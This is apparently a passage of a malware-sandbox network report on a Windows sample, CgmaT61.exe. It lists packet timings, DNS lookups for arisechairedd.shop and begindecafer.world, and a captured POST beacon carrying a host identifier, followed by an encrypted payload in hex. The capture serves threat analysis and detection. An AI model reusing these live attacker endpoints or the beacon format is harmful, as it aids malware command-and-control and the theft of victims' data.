Mar 7, 2025 19:45:51.236072063 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:51.271833897 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:51.271857023 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.043067932 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.043159008 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.048182011 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.048203945 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.048643112 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.093482018 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.112809896 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.112850904 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.113024950 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.871857882 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.872030020 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.872109890 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.872118950 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.872139931 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.872194052 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.872201920 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.878519058 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.878603935 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.878604889 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.878631115 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.878690004 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.878710985 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.887022018 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.887077093 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.887094975 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.937257051 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.958741903 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.959067106 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.959134102 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.960536957 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.960565090 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:53.960583925 CET	49682	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:53.960592031 CET	443	49682	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:54.182284117 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:54.182331085 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:54.182439089 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:54.182900906 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:54.182912111 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:55.841182947 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:55.841398954 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:55.843054056 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:55.843061924 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:55.843290091 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:55.844589949 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:55.844703913 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:55.844729900 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:56.826797962 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:56.827066898 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:56.827250957 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:56.827250957 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:56.960241079 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:56.960289001 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:56.960367918 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:56.960730076 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:56.960743904 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:57.140500069 CET	49683	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:57.140531063 CET	443	49683	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:58.716202021 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:58.716295004 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:58.717660904 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:58.717670918 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:58.717905998 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:58.719316006 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:58.719479084 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:58.719506025 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:58.719561100 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:58.764333963 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:59.788773060 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:59.788907051 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:45:59.789000988 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:59.789338112 CET	49684	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:45:59.789360046 CET	443	49684	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:00.012000084 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:00.012070894 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:00.012331963 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:00.012659073 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:00.012680054 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:01.841052055 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:01.841356039 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:01.843512058 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:01.843524933 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:01.843805075 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:01.845187902 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:01.845187902 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:01.845232010 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:01.845309019 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:01.845319033 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:02.870882988 CET	443	49685	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:02.871284008 CET	49685	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:03.284279108 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:03.284336090 CET	443	49686	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:03.284533978 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:03.284748077 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:03.284759045 CET	443	49686	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:04.918253899 CET	443	49686	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:04.918378115 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:04.919717073 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:04.919727087 CET	443	49686	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:04.920770884 CET	443	49686	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:04.922290087 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:04.922350883 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:04.922399998 CET	443	49686	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:05.750313997 CET	443	49686	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:05.750787973 CET	49686	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:06.224185944 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:06.224246979 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:06.224334955 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:06.224730968 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:06.224745989 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.919878960 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.920023918 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.921391964 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.921401978 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.921675920 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.926182985 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.927335024 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.927406073 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.927486897 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.927515030 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.927618027 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.927896976 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928010941 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928040028 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928169012 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928199053 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928348064 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928375006 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928390980 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928409100 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928523064 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928551912 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928575039 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928587914 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928690910 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928711891 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928729057 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928741932 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928759098 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928766966 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928786039 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928795099 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928860903 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928884983 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:07.928895950 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:07.928900957 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:09.665149927 CET	443	49687	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:09.665594101 CET	49687	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:09.735136032 CET	49688	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:09.735256910 CET	443	49688	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:09.735400915 CET	49688	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:09.735769033 CET	49688	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:09.735809088 CET	443	49688	104.21.16.1	192.168.2.8
Mar 7, 2025 19:46:11.156471968 CET	49688	443	192.168.2.8	104.21.16.1
Mar 7, 2025 19:46:11.171858072 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:11.171895981 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:11.171977997 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:11.172364950 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:11.172383070 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:12.965688944 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:12.965778112 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:12.969433069 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:12.969438076 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:12.969657898 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:12.970896006 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:12.970931053 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:12.970961094 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:13.774152994 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:13.774216890 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:13.774277925 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:13.774574041 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:13.774586916 CET	443	49689	188.114.97.3	192.168.2.8
Mar 7, 2025 19:46:13.774602890 CET	49689	443	192.168.2.8	188.114.97.3
Mar 7, 2025 19:46:13.774609089 CET	443	49689	188.114.97.3	192.168.2.8

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 7, 2025 19:45:51.213321924 CET	60070	53	192.168.2.8	1.1.1.1
Mar 7, 2025 19:45:51.228903055 CET	53	60070	1.1.1.1	192.168.2.8
Mar 7, 2025 19:46:11.157948971 CET	63092	53	192.168.2.8	1.1.1.1
Mar 7, 2025 19:46:11.170603991 CET	53	63092	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 7, 2025 19:45:51.213321924 CET	192.168.2.8	1.1.1.1	0xc36c	Standard query (0)	arisechairedd.shop	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:46:11.157948971 CET	192.168.2.8	1.1.1.1	0x6848	Standard query (0)	begindecafer.world	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Mar 7, 2025 19:45:51.228903055 CET	1.1.1.1	192.168.2.8	0xc36c	No error (0)	arisechairedd.shop	104.21.16.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:45:51.228903055 CET	1.1.1.1	192.168.2.8	0xc36c	No error (0)	arisechairedd.shop	104.21.64.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:45:51.228903055 CET	1.1.1.1	192.168.2.8	0xc36c	No error (0)	arisechairedd.shop	104.21.48.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:45:51.228903055 CET	1.1.1.1	192.168.2.8	0xc36c	No error (0)	arisechairedd.shop	104.21.112.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:45:51.228903055 CET	1.1.1.1	192.168.2.8	0xc36c	No error (0)	arisechairedd.shop	104.21.80.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:45:51.228903055 CET	1.1.1.1	192.168.2.8	0xc36c	No error (0)	arisechairedd.shop	104.21.96.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:45:51.228903055 CET	1.1.1.1	192.168.2.8	0xc36c	No error (0)	arisechairedd.shop	104.21.32.1	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:46:11.170603991 CET	1.1.1.1	192.168.2.8	0x6848	No error (0)	begindecafer.world	188.114.97.3	A (IP address)	IN (0x0001)	false
Mar 7, 2025 19:46:11.170603991 CET	1.1.1.1	192.168.2.8	0x6848	No error (0)	begindecafer.world	188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

arisechairedd.shop

begindecafer.world

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49682	104.21.16.1	443	6932	C:\Users\user\Desktop\CgmaT61.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-07 18:45:53 UTC	268	OUT	POST /JnsHY HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 59 Host: arisechairedd.shop
2025-03-07 18:45:53 UTC	59	OUT	Data Raw: 75 69 64 3d 37 62 32 39 35 35 36 36 35 39 37 66 32 35 61 37 32 61 32 34 34 35 33 30 39 34 61 37 62 35 31 61 31 37 35 36 65 30 65 66 32 30 38 63 66 61 37 38 39 33 26 63 69 64 3d Data Ascii: uid=7b295566597f25a72a24453094a7b51a1756e0ef208cfa7893&cid=
2025-03-07 18:45:53 UTC	792	IN	HTTP/1.1 200 OK Date: Fri, 07 Mar 2025 18:45:53 GMT Content-Type: application/octet-stream Content-Length: 14134 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z601yU3il5UtjOJzYf5sGGD2M7fh2%2Bdr22g1hgAN5V1FhvvzN3XthpT9e3zIYpS%2Fi07j%2BXSZBcxbBhsQYZQbv%2BV6s5qRioZSETiIqCEeaGlRgX22i7qnMH%2Bd9gctqScNoGG2jz4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91cc40a03e3c1407-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=31190&min_rtt=26001&rtt_var=7858&sent=6&recv=8&lost=0&retrans=0&sent_bytes=3055&recv_bytes=963&delivery_rate=135648&cwnd=238&unsent_bytes=0&cid=c7e54ab78e3e6ff9&ts=912&x=0"
2025-03-07 18:45:53 UTC	577	IN	Data Raw: c0 82 32 19 d7 96 47 a8 5f 4e a5 a8 c2 a2 2f da e4 f1 b2 b3 0c 9d 78 6d 0d 92 83 e8 f1 c1 01 0a 68 61 82 66 e2 d2 61 ab e8 a8 b8 17 5e a4 73 55 8e 6c ac 57 77 8e 76 47 80 09 21 ca 83 e0 77 9f b3 60 52 79 78 d9 b8 a9 0f bf 14 32 d1 51 f7 61 7b ea 5a 96 04 74 5e f8 2f 87 f1 f4 2e 05 19 e7 c2 0f e6 92 79 d1 ff 8d b3 6c cf d1 aa aa 2e 9f 2b a8 32 18 35 d6 87 42 bf 95 22 6a 00 0e ba a0 14 dc 7a a2 1e 98 6c 19 bf 49 56 49 46 c8 9e 14 92 5f bc d2 08 23 f7 c8 31 df 38 fa 62 3f 17 32 9c f4 63 6f d5 fb 70 72 87 94 f1 d6 17 6d b6 7b d3 86 19 40 e4 6d d2 18 a9 7a 4d 14 27 91 c3 09 13 21 f0 e1 fb b0 fb 8a b0 bf fa f9 eb 0e 5b 2e 12 84 e7 39 7e 5b d0 b1 f7 18 87 7f ac 79 b9 cd d1 c9 76 0c 03 fd 46 6d a0 64 fc 3f 0a a5 9f 03 80 6c eb b8 38 64 21 c9 e8 83 e3 94 2e 68 8d Data Ascii: 2G_N/xmhafa^sUlWwvG!w`Ryx2Qa{Zt^/.yl.+25B"jzlIVIF_#18b?2coprm{@mzM'![.9~[yvFmd?l8d!.h
2025-03-07 18:45:53 UTC	1369	IN	Data Raw: 84 4d b1 18 4b 41 2d 1d 86 6d 10 06 ee cf 7a da e8 84 f1 a2 9d f7 0e d2 21 b3 8e e2 33 88 1b 57 06 7d 15 21 b2 00 ac 6b 45 45 d7 96 60 e3 e2 30 66 ae d0 e5 6a e5 6f 9c bf a7 da c3 06 3f 71 1b a4 73 ce 9b 75 09 dc c1 2c a8 0c 7f b7 4f cf c1 29 34 9a c1 20 87 c6 a6 f2 14 2f 07 f9 f8 70 50 6b 38 dd a4 e7 0d 52 ca 36 d1 66 42 64 25 fc 70 c0 12 2c e4 ff ef 67 f7 64 10 6f da 6c 96 fb c7 f1 f8 67 10 f0 c3 fe 1c a4 8d 99 cf c2 f7 89 5c e8 66 31 cc 75 db f7 c2 b2 03 82 96 0b f4 0b 0a 6c 41 11 b7 31 26 73 ab 24 3c 65 6e 29 6b 7b 43 58 00 4a 3e 59 e0 6c b3 19 54 a0 99 42 8f df 21 53 a1 1f bc b4 cb 08 44 1a c3 21 ce 3d 40 da 5b 3d 60 08 6a eb 19 79 91 08 2a be 83 ff 27 f7 f8 fd c9 46 5f 4d cc 54 ff 95 7b 88 3b 6b 43 63 81 ac df 5f b5 44 7c f5 32 29 f5 59 a3 0d d1 10 Data Ascii: MKA-mz!3W}!kEE`0fjo?qsu,O)4 /pPk8R6fBd%p,gdolg\f1ulA1&s$<en)k{CXJ>YlTB!SD!=@[=`jy*'F_MT{;kCc_D\|2)Y
2025-03-07 18:45:53 UTC	1369	IN	Data Raw: 40 b8 62 a9 53 16 af 96 31 b2 49 8f aa ee fb b9 8b 0d ad 7a c7 be 1e 8d 41 7b e0 96 44 b1 8c 6d 12 06 29 94 c9 87 90 ce 19 8f bd 94 e1 17 fb 8e 5a ff e9 21 41 2c 4c 77 a4 25 cd 5c 38 63 91 59 a3 c8 d2 c4 32 39 da 54 ef fb 33 96 61 8f 9e 9c b2 18 a9 84 36 53 97 52 3a 66 81 c4 a2 57 1e c6 d9 9e 00 62 e5 b9 4c 30 b8 5c 10 63 71 e6 db 61 d5 d1 8f a3 67 fa 69 b1 82 4c 21 d9 30 0d 2b 18 02 1e 48 21 cf d6 4f 9d 7a 67 16 35 b0 bf c0 66 51 9a 75 a7 8c b8 c9 73 89 72 ca d0 da 05 a9 a6 6c 3d 03 18 5f 37 a3 fd ca d6 3f 38 a8 e4 c3 b7 4f a4 de 2d 02 e9 29 e3 03 3b 23 bf 65 27 99 e6 2b 1e ec 2b 8e 9b 98 89 26 f2 ba 1d bf 1e e8 5c b4 1e 2e d5 be 48 bc d3 e1 5b 93 09 71 b0 86 2a 27 7f 2e e4 aa 3c dd 3c c0 7e 80 3a 9f ae 1c 6e eb 24 4b 63 76 56 68 c4 a9 ed c1 61 4b 4e 3b Data Ascii: @bS1IzA{Dm)Z!A,Lw%\8cY29T3a6SR:fWbL0\cqagiL!0+H!Ozg5fQusrl=_7?8O-);#e'++&\.H[q*'.<<~:n$KcvVhaKN;
2025-03-07 18:45:53 UTC	1369	IN	Data Raw: 3d 10 3d 98 9e 0b 6c 00 33 12 16 cb 08 bd dc d1 5f 4a ef 91 cf 7d 85 6c 98 26 4f 79 47 b9 93 70 0d 06 96 77 93 98 35 19 68 c5 92 a0 e0 3b 3f b4 7a 84 30 cb 00 4d 01 89 dd c0 64 3f 28 ea b7 2e 99 76 6a cb 4f c9 ba dc 67 99 28 4c a2 6f 42 a6 2f ab b0 2a 88 78 5f 81 94 03 10 6f 42 80 cd 5d f6 60 1c 24 46 3d 67 6d 90 0e 1c bd 2a 56 9e c0 aa 7a 7d ef 9d de 5a 6a 75 46 e6 ad f4 14 47 bb 31 b2 26 ef db 23 80 a5 eb 20 53 4d cf 45 dc e9 92 48 d3 4b 23 1f 0d 2c 57 4e ce 7c 71 56 3f d9 8a 85 cf 70 fe c7 3a 8b 11 73 48 c0 f0 2f 36 81 e3 19 7c 2d e2 78 ae e8 23 d4 cf d8 80 03 d0 e0 7f 19 41 47 64 fb 95 eb 24 ba 0a 93 84 a1 97 a6 58 7a a0 82 76 a9 1d 6e ac fe 3e f0 ed dc f1 76 e9 67 d8 2d a7 cf c5 ba e8 6b a7 fc 1b 4b c9 4d 8f ab 27 5f db 49 35 2b 2d fb ca 72 bc 53 c2 Data Ascii: ==l3_J}l&OyGpw5h;?z0Md?(.vjOg(LoB/x_oB]`$F=gmVz}ZjuFG1&# SMEHK#,WN\|qV?p:sH/6\|-x#AGd$Xzvn>vg-kKM'_I5+-rS
2025-03-07 18:45:53 UTC	1369	IN	Data Raw: dc 47 4d 1d f3 88 70 ef 26 e3 2f 06 7c e9 60 ab e0 5b 67 29 e1 36 92 af 26 ac 1d 54 9f 6a a7 51 5b 8e 27 41 98 b8 62 32 a4 03 07 22 de d1 c1 24 cf e5 55 6e 52 41 5f 58 7e 01 e3 83 16 08 dd e6 18 0b 66 6c 67 20 70 50 8e 86 db 03 ab 64 20 8b b9 13 cc c2 4e 97 35 80 a4 46 58 3a 37 d3 fc 7a 3c 6e c5 85 5f 9a d6 8c 61 26 e6 ba e9 ea 42 81 d1 b5 8d df 31 26 5c b4 75 94 0a 80 be 88 5f be e6 70 47 ee 7c d0 49 b3 69 9d 5a e5 c0 79 64 4f cd ec b5 50 4e 52 53 52 ea 2f ec ea eb 55 d2 15 55 83 5e 69 8d 47 4e e4 7b 7d f9 57 01 1a d6 7b f9 91 c9 af 6e 80 ff 60 6b 56 0a 42 01 cf 91 40 b6 08 61 a0 1e da 4f 2d 5b 49 6a b3 85 48 5c 7e b6 85 bd e8 bd 33 8c e0 ab b1 56 e3 60 92 1b c4 cd ef 58 50 78 dc ab 61 2e 84 02 bb 42 cf d9 bd 9d c9 85 ea 44 d8 93 98 74 d0 f0 48 dd a8 c2 Data Ascii: GMp&/\|`[g)6&TjQ['Ab2"$UnRA_X~flg pPd N5FX:7z<n_a&B1&\u_pG\|IiZydOPNRSR/UU^iGN{}W{n`kVB@aO-[IjH\~3V`XPxa.BDtH
2025-03-07 18:45:53 UTC	1369	IN	Data Raw: fa 1b 80 88 3c 15 b0 b6 42 73 29 7b 6f aa e3 70 3d f6 e7 37 32 2d 1d bb df 93 c8 cd 65 c3 dc 74 ed 65 93 d0 4f f3 d5 a3 48 13 0b 68 d1 83 82 0b 20 02 fb 8c 4f 0d f4 44 65 61 8e 3b 97 a4 a5 ac 32 7a 3c 07 bc 17 d4 e0 50 a5 3f 01 8f 58 7d 67 6b 8e 3f 61 79 8f 59 88 2b 32 fc d5 90 01 8d af be 93 c0 c8 4e f2 39 aa e1 d1 03 7f 29 0d 78 59 ef 56 cf 12 aa cd 5a d5 63 28 19 8f 01 d3 7a 4e 64 b4 98 2c 1b 2c fb df 11 ab bc 5b 49 a6 3a fe d2 1b f5 7c 12 6a 32 71 3a 94 23 98 63 ef a1 ef 1c 7b fd 43 54 80 05 33 16 c0 af 89 b5 a1 f5 ac 1b ca 01 d1 0f 19 de ec 36 08 51 7e a8 ef 79 47 46 99 e1 82 91 54 d2 45 1c 81 ac a8 4e 90 54 70 fa 35 bb 18 f4 13 df fe 5a 99 56 57 80 c8 8e ae a6 04 f7 56 10 f5 c9 aa 56 47 06 a6 30 c1 7d 21 7b f7 d2 a9 43 30 ae 9d 9b 8a 92 2f 1b 16 5f Data Ascii: <Bs){op=72-eteOHh ODea;2z<P?X}gk?ayY+2N9)xYVZc(zNd,,[I:\|j2q:#c{CT36Q~yGFTENTp5ZVWVVG0}!{C0/_
